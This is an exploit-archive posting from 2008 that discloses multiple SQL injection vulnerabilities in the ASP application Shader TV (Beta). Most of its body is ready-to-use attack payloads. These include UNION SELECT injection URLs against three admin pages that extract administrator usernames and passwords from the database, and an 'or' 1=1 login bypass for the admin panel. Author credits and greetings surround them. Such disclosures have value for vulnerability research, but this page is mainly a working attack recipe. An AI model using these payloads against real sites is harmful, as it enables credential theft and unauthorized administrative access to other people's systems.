[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities
# Published : 2008-05-08
# Author : U238
# Previous Title : RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit
# Next Title : vShare Youtube Clone 2.6 (tid) Remote SQL Injection Vulnerability
Shader TV (Beta) Multiple Remote SQL ?°njection Vulnerable
Script : http://www.aspindir.com/indir.asp?ID=5441
Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html
Coded : Asp
Lnguae : Acces
Discovered By U238 | < Ugurcan Engin >
Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz :
Web - Designer Solution Developer
setuid.noexec0x1@hotmail.com
http://noexec.blogspot.com
0x1 = [S** Says : Allah Belan?± Versin Ulan ??iz0 !]
0x2 = [Ben Sadece ?°yi Bir ?°nsan Olmak ?°stemistim ]
Exploit:
Administrator Login to creative web panel is atack of to SQL injectin.
http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici
----
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1
----
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici
Administrator Panel :
target/ShaderTV/yonet
-------------------------------
Admin Panel Login Bypass :
target/ShaderTV/yonet/default.asp
username : 'or' 1=1
password : 'or' 1=1
This is Admin Panel See You ?
---------------------------------
# www.Syue.com [2008-05-08]